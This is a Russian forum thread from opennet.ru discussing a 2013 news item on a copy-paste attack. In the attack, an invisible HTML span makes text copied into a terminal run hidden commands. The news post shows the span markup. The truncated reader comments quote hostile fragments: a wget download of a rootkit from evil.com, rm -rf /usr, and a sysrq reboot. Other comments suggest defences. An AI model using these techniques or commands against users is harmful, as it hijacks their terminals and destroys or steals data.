forum.opennet.ru

"Концепция атаки по подмене копируемого в терминал текста с с..."

Форум Разговоры, обсуждение новостей
Версия для распечатки	Пред. тема \| След. тема

Исходное сообщение

[ Отслеживать ]

"Концепция атаки по подмене копируемого в терминал текста с с..."	+1 +/–
Сообщение от opennews (??), 08-Апр-13, 10:12
Опубликована (http://thejh.net/misc/website-terminal-copy-paste) интересная концепция тривиальной, но эффективной, атаки, рассчитанной на излишнее доверие к увиденных при копировании в терминал примеров команд с различных сайтов. Используя невидимый, но помещаемый в буфер обмена при копировании, блок "span", можно вместо невинного текста, организовать выполнение в терминале произвольных команд. <style> .codeblock { display: inline-block; margin-left: 50px; } </style> Например, после копирования в окно терминала строки "git clone <span style="position: absolute; left: -100px; top: -100px">/dev/null; clear; echo "Hello" git clone</span> git://git.kernel.org/pub/scm/utils/kup/kup.git" на самом деле будет выполнена команда "git clone /dev/null; clear; echo Hello" и отображён текст "git clone git://git.kernel.org/pub/scm/utils/kup/kup.git". URL: http://www.reddit.com/r/netsec/comments/1bv359/dont_copypast.../ Новость: http://www.opennet.me/opennews/art.shtml?num=36619
Ответить \| Правка \| Cообщить модератору

Оглавление

Концепция атаки по подмене копируемого в терминал текста с с..., opennews, 08-Апр-13, 10:12 [смотреть все]

вот это дырень О_О, zzzzz, 08-Апр-13, 10:12 (1) //
- http images wikia com callofduty ru images 6 69 D0 92 D0 BE D1 82_ D1 8D D1 8, Аноним, 08-Апр-13, 11:02 (10) //
  - Не беда Теперь вместо выделить что-то , копировать, вставитьвыделить что-то , к, Аноним, 08-Апр-13, 14:03 (26) //
    - Похожий эксплойт был на заре WWW, когда народ понял, что можно писать текст цв, pavlinux, 08-Апр-13, 15:06 (36)
      - И без зари, и без заката WWW я отродясь копирую текст сначала в самый тупой из р, 80е, 08-Апр-13, 20:41 (51)
        
        Да-да-да, конечно-конечно-конечно, мы тебе верим , pavlinux, 09-Апр-13, 05:25 (65)
Это скорее недоработка, чем дырень сообщение отредактировано модератором , Аноним, 08-Апр-13, 10:15 (2) //
- Вот именно, 80е, 08-Апр-13, 20:37 (49)
Да это просто 10 из 10 Ждем эпидемию вандализма в вики дистрибутивов , Okarin, 08-Апр-13, 10:24 (3) //
- В вики это не сработает, в них как правило HTML юзать не дают, только свою разме, MrClon, 09-Апр-13, 00:40 (60)
спасибо за идею , Аноним, 08-Апр-13, 10:27 (4)
шикарно же, как это еще раньше не нашли , Аноним, 08-Апр-13, 10:33 (5) //
- ты больной кто там этого 171 раньше не находил 187 , 80е, 08-Апр-13, 20:38 (50)
Видимо, следующее первое апреля будет на редкость удачным Ждем появления спец, Аноним, 08-Апр-13, 10:40 (6) //
- А при чем тут HTML5 В указанной конструкции нет ни 1 элемента из HTML5 , Аноним, 08-Апр-13, 11:03 (11) //
  - Ну, я про HTML5 и не писал Да и насколько мне известно, среднестатистический sh, Аноним, 08-Апр-13, 11:18 (13)
  - В дополнение rm path HOME class noecho Я джва года жду такой shell , Аноним, 08-Апр-13, 11:22 (15) //
    - class noecho,force,recursive , MrClon, 09-Апр-13, 00:46 (61)
Ну много же всяких, которые тянут любое говно в ближайший терминал без оглядки , skybon, 08-Апр-13, 11:17 (12)
Ну так копировать сначала в текстовый редактор и смотреть, что вставилось Лишне, Аноним, 08-Апр-13, 11:40 (17) //
- хоть кто-то так делает а сколько людей читают новостные сайты да эта хрень про, zzzzz, 08-Апр-13, 13:20 (21) //
  - При чём тут Ловить надо перевод строки , GotF, 08-Апр-13, 13:33 (22) //
    - По уму, надо бы просто чтобы невидимый текст никуда не копировался , Аноним, 08-Апр-13, 13:55 (23)
      - Ну как бы да, но беда в том, что в этих ваших интернетах есть 1001 способ сделат, GotF, 08-Апр-13, 14:20 (30)
    - echo Hello setsid sh -c wget -b -O usr bin http evil com rootkit sh ch, cmp, 08-Апр-13, 14:03 (25)
      - Это всё чудесно, но без n в нужном месте не выполнится , GotF, 08-Апр-13, 14:18 (29)
        
        Ещё r , gegMOPO4, 08-Апр-13, 16:30 (38)
В clipper-е в кедах видно сразу что там в буфер забилось можно там глядеть, пре, Слакварявод, 08-Апр-13, 11:58 (18)
Патч Брамина v 2 0 D, 1235235412831, 08-Апр-13, 12:50 (19) //
- Бармина , GotF, 08-Апр-13, 12:57 (20)
Теперь всё в блокнот копировать , Аноним, 08-Апр-13, 13:58 (24)
ну вот, спалили тему , нимус, 08-Апр-13, 14:06 (27)
Ваще-то это дыра в браузерах - то, что копируются не выделенные символы, а хрень, pavlinux, 08-Апр-13, 14:17 (28) //
- эта милая привычка браузеров выделять не то, что я вижу, а ещё всякую html разме, Клыкастый, 08-Апр-13, 14:25 (32) //
  - Сусли WТекст за пределами окна ты тож не видишь А он есть , Михрютка, 08-Апр-13, 23:46 (58)
- в CSSspan style position absolute left -100px top -100px именно выделенные, Михрютка, 08-Апр-13, 23:42 (57)
вставить как простой текст , энтер жать не сразу, не , Клыкастый, 08-Апр-13, 14:24 (31) //
- В простом тексте уже могут быть переводы строки Да и вычитывать большой блок , angra, 08-Апр-13, 14:34 (34) //
  - ну тогда - ой - вычитываем в vim-е - да и вообще копипастить отучаемся оригина, Клыкастый, 08-Апр-13, 14:39 (35) //
    - Гм А вот если там последовательность esc q rm -rf enter А вы в вим встав, Stax, 08-Апр-13, 20:57 (52)
      - уже лучше и под десяток всего , Клыкастый, 08-Апр-13, 21:45 (53)
Не понимаю сути проблемы В гну линукс такой бардак что написать строчку которая, Аноним, 08-Апр-13, 15:22 (37) //
- rm -rf usr, Аноним, 08-Апр-13, 17:03 (39) //
  - rm -rf init 6, Аноним, 08-Апр-13, 17:17 (41) //
    - code bash init command not found code , Xasd, 08-Апр-13, 22:08 (54)
      - reboot или shutdown -h now, Аноним, 09-Апр-13, 01:12 (62)
        
        code rebootbash reboot command not found shutdown -h nowbash shutdown , Xasd, 09-Апр-13, 03:15 (63)
        
        gt оверквотинг удален echo b proc sysrq-trigger, pavlinux, 09-Апр-13, 05:29 (66)
- понимаешь друг линукс тут вообще не при чем, эта уязвимость будет работать на , Онононо, 08-Апр-13, 17:15 (40) //
  - Пользователи винды не очень часто вставляют комманды с веб-сайтов в cmd exe, Аноним, 08-Апр-13, 18:02 (42) //
    - Для пользователей винды то ли на Баше, то ли ItHappens был описан Формат Улыбки , Аноним, 08-Апр-13, 18:25 (43)
    - ты окромя винды больше осей не знаешь , Онононо, 08-Апр-13, 18:35 (44)
    - так правильно , Аноним, 08-Апр-13, 19:16 (46)
      - А должны , Аноним, 10-Апр-13, 16:55 (68)
    - Когда http paypal com на самом деле копируется как http lskdjbsnd tk sdefj , Aceler, 08-Апр-13, 19:52 (47)
      - Firefox can t find the server at www lskdjbsnd tk , Xasd, 09-Апр-13, 03:33 (64)
    - как бы сказать уних такой возможности даже нет вот павершеле там и возмо, Харитон, 08-Апр-13, 22:22 (56)
  - Я про то почти никогда не имеет смысл что-то копипастить с сайтов В прочем url в, Аноним, 08-Апр-13, 19:14 (45)
  - , Xasd, 08-Апр-13, 22:10 (55)
реквестирую буфер обмена с программируемой логикой, mmrnmhrm, 08-Апр-13, 20:29 (48)
постить на опеннете новости с угловыми скобками в тексте - идеальный метод тролл, Михрютка, 08-Апр-13, 23:50 (59)
В urxvt есть плагин confirm-paste, требующий подтверждения при вставке многостро, Аноним, 09-Апр-13, 13:15 (67)

Форумы | Темы | Пред. тема | След. тема

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру